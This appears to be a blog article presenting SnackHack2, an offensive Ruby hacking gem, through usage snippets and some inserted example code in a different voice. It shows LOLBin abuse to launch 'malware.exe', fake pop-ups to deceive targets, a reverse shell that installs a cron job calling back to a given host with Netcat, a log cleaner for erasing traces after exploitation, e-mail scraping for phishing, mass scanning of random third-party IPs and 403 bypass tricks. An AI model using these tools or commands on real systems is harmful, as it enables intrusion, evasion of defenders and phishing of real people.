
SnackHack2: Hacking tool and Recon

This tool comes in gem form and can also be downloaded from GitHub.com. Originally, this project would be my senior project, but I had to scrap the idea for a simpler project due to my course workload and mental health.

Please check out my other article about this tool, SnackHack2: Scripts, which takes the SnackHack2 program and shows examples of possible use cases.

To install the gem, run the command below.

gem install snackhack2

Check out useful scripts in action here & the tests here.

Indirect Command Injection

When run, this code uses the wlrmdr.exe LOLBin (the Windows Logon Reminder binary) to show a pop-up with the title "CLICK ME" and the prompt text "test". Because the dialog looks like a system notice, it can be used to trick the target into running a command or program. The prompt and title can, of course, be changed to anything.

cj = Snackhack2::CommandInjection.new
cj.prompt = "test"
cj.title = "CLICK ME"
cj.wlrmdr_With_prompt

As the name implies, wlrmdr_without_prompt does the same thing but without the prompt. By default it runs "calc.exe", but this can be changed as seen below.

cj = Snackhack2::CommandInjection.new
cj.exe = "runme.exe"
cj.wlrmdr_without_prompt

Conhost

Conhost.exe (the Windows console host) is a LOLBin that can be used to launch another executable. By default the method runs "calc.exe".

cj = Snackhack2::CommandInjection.new
cj.exe = "malware.exe"
cj.conhost


## Same as above, but the console window is hidden.
cj.conhost_hide

SSH.exe to execute command

ssh.exe, the OpenSSH client shipped with Windows, is another LOLBin: its ProxyCommand option launches an arbitrary program. As before, the code below runs "calc.exe" by default; the executable can be changed to anything.

cj = Snackhack2::CommandInjection.new
cj.exe = "runme.exe"
cj.ssh

LOLBin PSR.exe Recording Screen

The code below uses a feature built into Windows, psr.exe (the Problem Steps Recorder), to record the screen. By default it saves the screenshots to a file named "screenshots.zip"; again, this can easily be changed. By default it records for 60 seconds, but this can also be changed as seen below.

ss = Snackhack2::ScreenShot.new
ss.time = 64
ss.run

IP Lookup

An IP (Internet Protocol) address identifies every host on the Internet, so every server behind a website has one. This feature uses nslookup and ping to resolve the site's hostname to its IP address. Resolving the target is a standard step in the recon stage of an attack.

i = Snackhack2::IpLookup.new("https://x.com")
i.run

Extract Emails from Website

A hacker or pen tester needs targets. One way to acquire them is to use a spider that crawls a site and scrapes every e-mail address it finds, which can then be used for phishing. By default max_depth (how many links deep the crawl follows from the start page) is 2; this can be changed as in the example below.

This is another way for a threat actor to perform recon on a target: with a user's e-mail address they can try to phish that user or get them to install malware.

e = Snackhack2::Email.new("https://www.tupeloschools.com/leadership/staff-directory")

# max_depth defaults to 2; set it before calling run so the crawl honours it
e.max_depth = 2
puts e.max_depth
e.run
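To make the max_depth setting concrete, here is an added example (my own code, not the SnackHack2 gem's) of a depth-limited e-mail spider. The fetcher is injected, so the crawl runs here against a constructed in-memory site (target.example is made up) and can be pointed at the real web with the Net::HTTP fetcher at the bottom; class and constant names are my own.

```ruby
require 'set'
require 'uri'
require 'net/http'

# Added example (not SnackHack2's own code): a depth-limited spider that
# scrapes e-mail addresses, showing what max_depth controls.
EMAIL_RE = /\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b/
HREF_RE  = /href\s*=\s*["']([^"'#]+)["']/i

class EmailSpider
  attr_accessor :max_depth

  def initialize(start_url, fetcher, max_depth: 2)
    @start_url = start_url
    @fetch     = fetcher          # callable: url -> HTML string, or nil on failure
    @max_depth = max_depth
    @seen      = Set.new
    @emails    = Set.new
  end

  # Crawl and return the unique addresses found, sorted.
  def run
    crawl(@start_url, 0)
    @emails.to_a.sort
  end

  private

  def crawl(url, depth)
    return if depth > @max_depth || @seen.include?(url)
    @seen << url
    html = @fetch.call(url)
    return unless html
    @emails.merge(html.scan(EMAIL_RE).map(&:downcase))   # mailto: links are caught too
    html.scan(HREF_RE).flatten.each do |href|
      begin
        next_url = URI.join(url, href).to_s
      rescue URI::Error
        next
      end
      next unless URI(next_url).host == URI(@start_url).host   # stay on the target domain
      crawl(next_url, depth + 1)
    end
  end
end

# Constructed in-memory site for an offline run. Depth: "/" is 0, "/staff" is 1,
# "/staff/bob" is 2 and "/staff/bob/notes" is 3, so max_depth 2 never sees carol.
DEMO_SITE = {
  'https://target.example/'                => '<a href="/staff">Staff</a> <a href="https://other.example/">partner</a>',
  'https://target.example/staff'           => '<p>Contact alice@target.example</p> <a href="/staff/bob">Bob</a>',
  'https://target.example/staff/bob'       => '<a href="mailto:Bob@target.example">Mail Bob</a> <a href="/staff/bob/notes">notes</a>',
  'https://target.example/staff/bob/notes' => 'carol@target.example',
}.freeze
DEMO_FETCHER = ->(url) { DEMO_SITE[url] }

# Real fetcher (no redirect handling) for a site you are authorised to test.
HTTP_FETCHER = ->(url) { Net::HTTP.get(URI(url)) rescue nil }

if __FILE__ == $PROGRAM_NAME
  [2, 3].each do |d|
    found = EmailSpider.new('https://target.example/', DEMO_FETCHER, max_depth: d).run
    puts "max_depth=#{d}: #{found.inspect}"
  end
end
```

Raising max_depth by one brings carol into scope; the off-site link to other.example is never followed, which keeps the crawl inside the engagement's scope.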

Web Server log cleaner

This code searches the web server logs for the given IP address and replaces every occurrence with a randomly generated IP.

This is useful post-exploitation when a hacker or pen tester wants to remove traces of scanning the web server or of how a vulnerability in the site was exploited. Note that it only rewrites the local log files: copies already shipped to a remote syslog server or SIEM are untouched, and an inconsistency between local and remote logs is itself a signal to a defender.

w = Snackhack2::WebServerCleaner.new('8.1.9.2')
w.run

WordPress

WordPress is another Content Management System. This part of the code works like the Drupal scoring system: it tries to determine whether the site is built with WordPress.

The higher the score, the more likely the site is built with WordPress. Every time the code detects a WordPress indicator it adds 10 to the score; there are currently 7 elements in the array of indicators the code checks for.

require "snackhack2"
w = Snackhack2::WordPress.new("https://kinsta.com")
w.run

Other features of this code are that it tries to detect how many users there are and their usernames, and checks for open directories. During the recon stage of an attack the threat actor must find out what software, and which versions, the web server is running so they can check whether any of it is vulnerable.

Examples of other possible scripts can be found here.

Reverse Shell

Prints out the command to run and sets a cron job that runs every minute and uses Netcat to connect back to the given host and port.

l = Snackhack2::ReverseShell.new("6.1.9.1", "9")
l.run
r = Snackhack2::ReverseShell.new("1.1.1.1", "4")
r.bash

## Version 2 of the bash reverse shell
r.version2

List Users

Search for users on Windows. After compromising the victim, the threat actor might want to gather the usernames of the people using the computer. This feature helps gather that information.

lu = Snackhack2::ListUsers.new
lu.user = "admin"
lu.windows_search_user

List users on Linux-based systems by reading the "/etc/passwd" file.

lu = Snackhack2::ListUsers.new
lu.linux

The code below will list all the users on a Windows-based system.

lu = Snackhack2::ListUsers.new
lu.windows

The code below determines whether the operating system is Windows or Linux and runs the matching user listing.

lu = Snackhack2::ListUsers.new
lu.auto

Gathering Google Analytics

Uses a handful of different regexes to extract the Google Analytics tracking code from a site.

ga = Snackhack2::GoogleAnalytics.new
ga.site = "https://abc.com"
ga.run

Scraping The Top Sites

require_relative '../lib/snackHack2'

ga = Snackhack2::GoogleAnalytics.new
File.readlines("top-1000000-domains.txt").each do |site|
  site = site.strip
  ga.site = "https://#{site}"
  g = nil                   # reset so a failed run cannot reuse the previous site's result
  begin
    g = ga.run.shift
  rescue StandardError
    next                    # unreachable host, TLS error, etc.
  end
  next if g.nil? || g.include?("[+] No Google Analytics found :(")
  p g
  puts site
  File.open("top_gas.txt", 'a') { |file| file.write("#{g}:#{site}\n") }
end

The top sites list can be found here.

Getting a Site’s SSL Cert Hash

This code connects to the site, fetches its TLS (SSL) certificate and prints the certificate's hash, i.e. its fingerprint.

ssl =  Snackhack2::SSLCert.new
ssl.site = "https://google.com"
ssl.get_cert
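What that hash actually is, as an added example (my own code, not the gem's): a certificate fingerprint is a digest over the DER encoding of the leaf certificate, the same value `openssl s_client -connect host:443 | openssl x509 -fingerprint -sha256` prints. The function and constant names are mine; the self-signed certificate is generated in-process so the block runs offline, and `fetch_leaf_cert` is the network path for a real host.

```ruby
require 'openssl'
require 'socket'

# Added example (not SnackHack2's own code). Fingerprint = digest of the
# certificate's DER bytes, printed in the familiar colon-separated form.
def cert_fingerprint(cert, algo = 'SHA256')
  hex = OpenSSL::Digest.new(algo).hexdigest(cert.to_der)
  hex.upcase.scan(/../).join(':')
end

# Pull the leaf certificate a server presents for `host`. SNI is set so a
# virtual-hosted site returns the right certificate. Verification is disabled
# on purpose: we are recording what is presented, not trusting it.
def fetch_leaf_cert(host, port = 443)
  ctx = OpenSSL::SSL::SSLContext.new
  ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
  tcp = TCPSocket.new(host, port)
  ssl = OpenSSL::SSL::SSLSocket.new(tcp, ctx)
  ssl.hostname = host
  ssl.connect
  ssl.peer_cert
ensure
  ssl&.close
  tcp&.close
end

# Compare a certificate against a pinned fingerprint, accepting "AB:CD:..."
# or bare hex in either case. Useful for spotting a swapped certificate
# between two recon runs.
def fingerprint_matches?(cert, pinned)
  cert_fingerprint(cert).delete(':').downcase == pinned.delete(':').downcase
end

# Throwaway self-signed certificate so the functions can be exercised offline.
def self_signed_demo_cert(cn = 'demo.example')
  key  = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.version    = 2
  cert.serial     = 1
  cert.subject    = OpenSSL::X509::Name.parse("/CN=#{cn}")
  cert.issuer     = cert.subject
  cert.public_key = key.public_key
  cert.not_before = Time.now
  cert.not_after  = Time.now + 3600
  cert.sign(key, OpenSSL::Digest.new('SHA256'))
  cert
end

if __FILE__ == $PROGRAM_NAME
  # ruby cert_fingerprint.rb example.com   (or no argument for the demo cert)
  cert = ARGV[0] ? fetch_leaf_cert(ARGV[0]) : self_signed_demo_cert
  puts "subject: #{cert.subject}"
  puts "SHA256:  #{cert_fingerprint(cert)}"
  puts "SHA1:    #{cert_fingerprint(cert, 'SHA1')}"
end
```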

Getting A Site’s Meta Data

Most sites have meta tags that describe the site. They are used for SEO, to rank better on Google for relevant searches.

meta = Snackhack2::WebsiteMeta.new
meta.site = "https://abc.com"
meta.run

puts "[+] Getting a website's META description\n".red
meta.description

Bypassing 403 & 401

This code performs a handful of small tricks (path variations, case changes, URL encoding) that may get past a 403 Forbidden or 401 Unauthorized response. It can take a while because it iterates over a list of web paths.

ph = Snackhack2::BypassHTTP.new
ph.site = "https://example.com"

# each method tries one family of bypass tricks against the site
ph.dots
ph.basic
ph.uppercase
ph.url_encode
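To show what those families of tricks look like on the wire, here is an added example (my own code, not the gem's; how the gem groups its variants under dots/basic/uppercase/url_encode is my assumption). `bypass_candidates` only builds the variants, so it runs offline; `probe_bypass` sends them and should only be pointed at a host you are authorised to test. Function names and the header list are mine.

```ruby
require 'uri'
require 'net/http'

# Added example (not SnackHack2's own code): the request variants a
# 403/401 bypass pass typically tries, grouped by technique. Nothing is sent.
def bypass_candidates(url)
  uri  = URI.parse(url)
  port = uri.port == uri.default_port ? '' : ":#{uri.port}"
  base = "#{uri.scheme}://#{uri.host}#{port}"
  path = uri.path.empty? ? '/' : uri.path
  last = path.split('/').last.to_s
  tail = ->(s) { path.sub(/#{Regexp.escape(last)}\z/, s) }   # rewrite the final segment
  {
    # dot tricks: the front end matches the literal path, the back end normalises it
    dots:       ["#{base}#{path}/.", "#{base}/.#{path}", "#{base}#{path}/..;/", "#{base}#{path}%2e"],
    # suffixes and separators an ACL written for the exact path may not cover
    basic:      ["#{base}#{path}/", "#{base}#{path}//", "#{base}#{path}?", "#{base}#{path}%20",
                 "#{base}#{path}%09", "#{base}#{path}.json", "#{base}#{path};"],
    # case variants for a case-insensitive back end behind a case-sensitive ACL
    uppercase:  ["#{base}#{path.upcase}", "#{base}#{tail[last.capitalize]}"],
    # percent-encode every byte of the final segment
    url_encode: ["#{base}#{tail[last.bytes.map { |b| format('%%%02X', b) }.join]}"],
    # header overrides that some proxies and frameworks honour
    headers:    [{ 'X-Original-URL' => path }, { 'X-Rewrite-URL' => path },
                 { 'X-Forwarded-For' => '127.0.0.1' }, { 'X-Custom-IP-Authorization' => '127.0.0.1' }],
  }
end

# Send every candidate and collect [technique, target, headers, status]. A 200
# where the plain URL gave 403/401 deserves a manual look; it is not proof of
# a bypass until the body is checked.
def probe_bypass(url)
  results = []
  bypass_candidates(url).each do |technique, items|
    items.each do |item|
      target, extra = technique == :headers ? [url, item] : [item, {}]
      code = begin
        u = URI(target)
        Net::HTTP.start(u.host, u.port, use_ssl: u.scheme == 'https') do |http|
          http.request(Net::HTTP::Get.new(u.request_uri, extra)).code
        end
      rescue StandardError => e
        e.class.name
      end
      results << [technique, target, extra, code]
    end
  end
  results
end

if __FILE__ == $PROGRAM_NAME
  bypass_candidates('https://example.com/admin').each do |technique, items|
    puts "#{technique}: #{items.inspect}"
  end
end
```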

Extract Crypto Addresses

Scrapes a page for cryptocurrency addresses of the following types:

  • Monero
  • Bitcoin
  • Litecoin
  • Dash
  • Stellar
  • Ethereum
  • Bitcoin Cash
  • Dogecoin

ca = Snackhack2::CryptoExtractWebsite.new("https://coincarp.com/currencies/tron/richlist/")
puts ca.save_file          # print the current save_file setting
ca.save_file = false       # keep the results in memory only
puts ca.save_file
ca.run

# per-currency extraction
ca.monero
ca.bitcoin
ca.litecoin
ca.dash
ca.stellar
ca.ethereum
ca.bitcoincash
ca.dogecoin
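For the same eight currencies, an added example (my own code, not the gem's, and not necessarily the patterns it uses) of regex-based extraction. The patterns check shape only (prefix, alphabet, length), not checksums, so hits are candidates to validate rather than confirmed addresses. The sample page is constructed: the Bitcoin and Ethereum strings are the widely published documentation examples, the rest are made-up strings of the right shape.

```ruby
# Added example (not SnackHack2's own code): shape-based address extraction.
BASE58 = '[1-9A-HJ-NP-Za-km-z]'   # Bitcoin-style alphabet: no 0, O, I, l
BECH32 = '[ac-hj-np-z02-9]'       # bech32 / cashaddr alphabet: no 1, b, i, o

CRYPTO_PATTERNS = {
  bitcoin:     /\b(?:[13]#{BASE58}{25,34}|bc1#{BECH32}{39,59})\b/,
  litecoin:    /\b(?:[LM]#{BASE58}{26,33}|ltc1#{BECH32}{39,59})\b/,
  dogecoin:    /\bD[5-9A-HJ-NP-U]#{BASE58}{32}\b/,
  dash:        /\bX#{BASE58}{33}\b/,
  monero:      /\b[48][0-9AB]#{BASE58}{93}\b/,      # 95-char standard (4...) or subaddress (8...)
  stellar:     /\bG[A-Z2-7]{55}\b/,                 # base32 public key, 56 chars
  ethereum:    /\b0x[0-9a-fA-F]{40}\b/,
  bitcoincash: /\b(?:bitcoincash:)?[qp][a-z0-9]{41}\b/,   # loose: cashaddr without checksum
}.freeze

# Returns { currency => [unique matches in page order] }.
def extract_crypto_addresses(text)
  CRYPTO_PATTERNS.transform_values { |re| text.scan(re).uniq }
end

# Constructed sample page. Monero/Stellar/LTC/DOGE/DASH/BCH values are
# synthetic strings of the right alphabet and length, built here so the
# lengths are exact.
MONERO_SAMPLE  = '4A' + ('gR7JbWp2Nx' * 9) + 'gR7'
STELLAR_SAMPLE = 'G' + ('A2B3C4D5E6F7' * 5)[0, 55]
SAMPLE_PAGE = <<~HTML.freeze
  <p>Donate BTC 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2 (legacy) or bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq (bech32)</p>
  <p>ETH 0xde0B295669a9FD93d5F28D9Ec85E40f4cb697BAe</p>
  <p>XMR #{MONERO_SAMPLE}</p>
  <p>LTC L#{('gR7JbWp2Nx' * 4)[0, 32]} DOGE D7#{('gR7JbWp2Nx' * 4)[0, 32]} DASH X#{('gR7JbWp2Nx' * 4)[0, 33]}</p>
  <p>XLM #{STELLAR_SAMPLE}</p>
  <p>BCH bitcoincash:q#{('qpzry9x8gf' * 5)[0, 41]}</p>
  <p>Not an address: 0xdeadbeef, support@example.com, 12345</p>
HTML

if __FILE__ == $PROGRAM_NAME
  extract_crypto_addresses(SAMPLE_PAGE).each do |currency, found|
    puts "#{currency}: #{found.inspect}"
  end
end
```

Legacy "3..." Bitcoin and "M..." Litecoin addresses are genuinely ambiguous by shape alone, which is one reason to follow up a hit with a checksum (Base58Check or bech32) before reporting it.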

SiteMap XML

sm = Snackhack2::SiteMap.new("https://x.com")
sm.run

Port Scan

The SnackHack2 code runs a port scan against the given IP and displays the results in the terminal.

A port scanner is used to perform recon on a target machine: it reports which ports are open, closed or filtered. Only scan hosts you are authorised to test.

tcp = Snackhack2::PortScan.new
tcp.ip = "167.71.98.134"
tcp.run
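What "open, closed or filtered" means at the socket level, as an added example (my own code, not the gem's): a TCP connect scan classifies a port by how the connect attempt ends. The function names are mine; the demo uses a listener on 127.0.0.1 so it runs without touching anyone else's host.

```ruby
require 'socket'

# Added example (not SnackHack2's own code): a minimal TCP connect scanner.
#   :open      the three-way handshake completed
#   :closed    the host answered with a RST (ECONNREFUSED)
#   :filtered  nothing came back before the timeout, typically a firewall
#              silently dropping the SYN
# Only scan hosts you are authorised to test.
def probe_port(host, port, timeout_s = 1.0)
  sock = Socket.tcp(host, port, connect_timeout: timeout_s)
  sock.close
  :open
rescue Errno::ECONNREFUSED
  :closed
rescue Errno::ETIMEDOUT
  :filtered
rescue Errno::EHOSTUNREACH, Errno::ENETUNREACH, SocketError
  :unreachable
end

# Scan a list of ports and return { port => state }.
def scan_ports(host, ports, timeout_s = 1.0)
  ports.each_with_object({}) { |port, h| h[port] = probe_port(host, port, timeout_s) }
end

if __FILE__ == $PROGRAM_NAME
  # Demo against the local machine: open a listener so one port reports :open,
  # then close it so the same port reports :closed.
  server    = TCPServer.new('127.0.0.1', 0)
  demo_port = server.addr[1]
  puts scan_ports('127.0.0.1', [demo_port, 1]).inspect
  server.close
  puts "#{demo_port} after close: #{probe_port('127.0.0.1', demo_port)}"
end
```

A connect scan completes the handshake, so it shows up in the target's application logs; SYN scans avoid that but need raw sockets and root, which is why most scripting-language scanners look like this one.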

The code below generates 100 random IPs and port scans each of them. Note that these are arbitrary public addresses, so this is unsolicited scanning of third parties.

require 'snackhack2'

tcp = Snackhack2::PortScan.new
tcp.count = 100
tcp.mass_scan

The code below scans every host in a /24 like the other examples, then extracts only the results for one port; in this case port 22, which is usually SSH.

require './lib/snackHack2'

tcp = nil
(0..255).each do |i|
  puts "167.71.98.#{i}"
  tcp = Snackhack2::PortScan.new
  tcp.ip = "167.71.98.#{i}"
  tcp.run
  print "\n\n"
end
tcp.delete = true
tcp.ports_extractor("22")

DNS

The code below chains a few of the features: a DNS lookup, an IP lookup and a port scan. It gets the nameservers for utica.edu, resolves each one and saves the addresses in an array named ips, then port scans every IP collected from the dns function.

require './lib/snackHack2'

ps   = Snackhack2::PortScan.new
dns  = Snackhack2::Dns.new
ip   = Snackhack2::IpLookup.new 

ips  = []


dns.site  = "utica.edu"
ns        = dns.nameserver
ns.each do |i|
 ip.site = i
 ips << ip.get_ip.shift
end

ips.each do |ii|
 ps.ip = ii.to_s
 ps.run
end

AAAA

Get a site’s AAAA (IPv6) records.

dns = Snackhack2::Dns.new
dns.site = "abc.com"
puts "AAAA: "
dns.aaaa.each do |s|
	puts s
end

A

dns = Snackhack2::Dns.new
dns.site = "abc.com"
puts "A Record: "
dns.a.each do |a|
	puts a
end

Nameserver

dns = Snackhack2::Dns.new
dns.site = "abc.com"

puts "Nameserver: "
dns.nameserver.each do |ns|
	puts ns
end

SOA 

dns = Snackhack2::Dns.new
dns.site = "abc.com"
puts "SOA: "
dns.soa.each do |s|
	puts s
end

TXT

dns = Snackhack2::Dns.new
dns.site = "abc.com"
puts "TXT: "
dns.txt.each do |s|
	puts s
end

hinfo

dns = Snackhack2::Dns.new
dns.site = "abc.com"
puts "hinfo: "

dns.hinfo.each do |s|
	puts s
end

MX

dns = Snackhack2::Dns.new
dns.site = "abc.com"
puts "MX: "
dns.mx.each do |s|
	puts s
end

Extract Comments From Code

require '../lib/snackHack2'

rc = Snackhack2::RubyComments.new
rc.file = "test_comments.txt"
rc.comments
rc.comment_block


puts "[+] Getting HTML comments\n".red
c = Snackhack2::Comments.new
c.site = "https://abc.com"
c.run

Host Injection

As the method names suggest, these checks send the request with a modified Host header, a duplicated Host header and an X-Forwarded-* header (old_host_ip being the original host and new_host_ip the injected one) to see whether the application trusts the header value, for example when building links or making access-control decisions.

hi = Snackhack2::HostInjection.new

hi.site = "http://127.0.0.1:4567/admin"
hi.old_host_ip = "172.28.170.34"
hi.new_host_ip = "192.168.1.100"

hi.host_ip
hi.double_host_ip
hi.x_forwarded

WordPress – Yoast SEO

ww = Snackhack2::WordPress.new
ww.site = "https://www.caicorp.com"
ww.yoast_seo(print_version: true)
puts ww.yoast_seo

Get Robots.txt

url = "https://abc.com"
r = Snackhack2::Robots.new(url)
r.run

Disallow

url = "https://abc.com"
r = Snackhack2::Robots.new(url)
r.disallow_robots.each do |da|
  puts da
end

Allowed

url = "https://abc.com"
r = Snackhack2::Robots.new(url)
r.allow_robots.each do |da|
  puts da
end
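What Robots.new is pulling apart, as an added example (my own code, not the gem's): a small robots.txt parser that groups Allow/Disallow rules per User-agent and collects Sitemap lines. Disallow entries are recon gold, since they name the paths the owner would rather not have indexed. The sample robots.txt below is constructed, not fetched from any real site; the function names are mine.

```ruby
# Added example (not SnackHack2's own code): parse robots.txt into
# per-user-agent allow/disallow lists plus any Sitemap URLs.
def parse_robots(text)
  groups   = Hash.new { |h, k| h[k] = { allow: [], disallow: [] } }
  sitemaps = []
  current  = []            # user-agents the following rules apply to
  in_agent_block = false   # true while consecutive User-agent lines are being read
  text.each_line do |raw|
    line = raw.sub(/#.*/, '').strip          # drop comments and whitespace
    next if line.empty?
    field, _, value = line.partition(':')    # split on the first colon only, URLs keep theirs
    field = field.strip.downcase
    value = value.strip
    case field
    when 'user-agent'
      current = [] unless in_agent_block     # first agent line of a new group
      current << value
      groups[value]                          # create the group even if it ends up empty
      in_agent_block = true
    when 'allow', 'disallow'
      in_agent_block = false
      next if value.empty?                   # "Disallow:" with no value allows everything
      current.each { |ua| groups[ua][field.to_sym] << value }
    when 'sitemap'
      in_agent_block = false
      sitemaps << value
    else
      in_agent_block = false
    end
  end
  { groups: groups, sitemaps: sitemaps }
end

# Paths an agent is told to stay out of (defaults to the wildcard group).
def disallowed_paths(text, agent = '*')
  parse_robots(text)[:groups][agent][:disallow]
end

# Constructed sample, not fetched from any real site.
SAMPLE_ROBOTS = <<~ROBOTS.freeze
  # crawler policy
  User-agent: *
  Disallow: /admin/
  Disallow: /backup/    # old database dumps
  Allow: /admin/public/

  User-agent: Googlebot
  User-agent: Bingbot
  Disallow:

  Sitemap: https://abc.com/sitemap.xml
ROBOTS

if __FILE__ == $PROGRAM_NAME
  puts "Disallowed for *: #{disallowed_paths(SAMPLE_ROBOTS).inspect}"
  puts "Sitemaps: #{parse_robots(SAMPLE_ROBOTS)[:sitemaps].inspect}"
end
```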
Banner Grabbing

require_relative '../lib/snackHack2'

bg = Snackhack2::BannerGrabber.new
bg.site = "100.33.33.33"

# uses tcp socket
#bg.get_tcp_info

bg.site = "https://abc.com"

# Get if server is using nginx...
puts "[+] Testing if site is using nginx... [+]"
bg.nginx
puts "\n\n\n{=============================================}\n\n\n"
# Using cURL to get headers
puts "[+] Using cURL to get the site's headers [+]"
bg.curl
puts "\n\n\n{=============================================}\n\n\n"

# Check if server is using apache
puts "[+] Testing if site is using Apache2... [+]"
bg.apache2

puts "\n\n\n{=============================================}\n\n\n"

# Check if server is running wordpress...
puts "[+] Testing if site is using wordpress... [+]"
bg.site = "https://krebsonsecurity.com"

bg.wordpress


# Checking for cloudflare headers
puts "[+] Checking for cloudflare headers! [+]\n\n\n"

bg.cloudflare

puts "\n\n\n{=============================================}\n\n\n"

# checking for cloudflare headers w/o printing them
puts "[+] Checking for cloudflare headers w/o printing [+]\n\n\n"
bg.site = "https://abc.com"
p bg.cloudflare(print_status: false)

puts "\n\n\n{=============================================}\n\n\n"

# Checking for cloudfront in the headers
puts "\n\n\n[+] Checking for cloudfront headers [+]\n\n\n"
bg.cloudfront

puts "\n\n\n{=============================================}\n\n\n"

# checking for cloudfront headers  w/o printing
# It will return the results in an array.
puts "\n\n\n[+] Checking for cloudfront headers w/o printing [+]\n\n\n"
p bg.cloudfront(print_status: false)

puts "\n\n\n{=============================================}\n\n\n"

# Detect the site's headers; by default the result is returned as a hash
puts "\n\n\n[+] Detecting headers and returning them [+]\n\n\n"
p bg.detect_header

puts "\n\n\n{=============================================}\n\n\n"

# Detect the headers and print them instead of returning them
puts "\n\n\n[+] Detecting headers and printing them [+]\n\n\n"

bg.detect_header(return_status: false)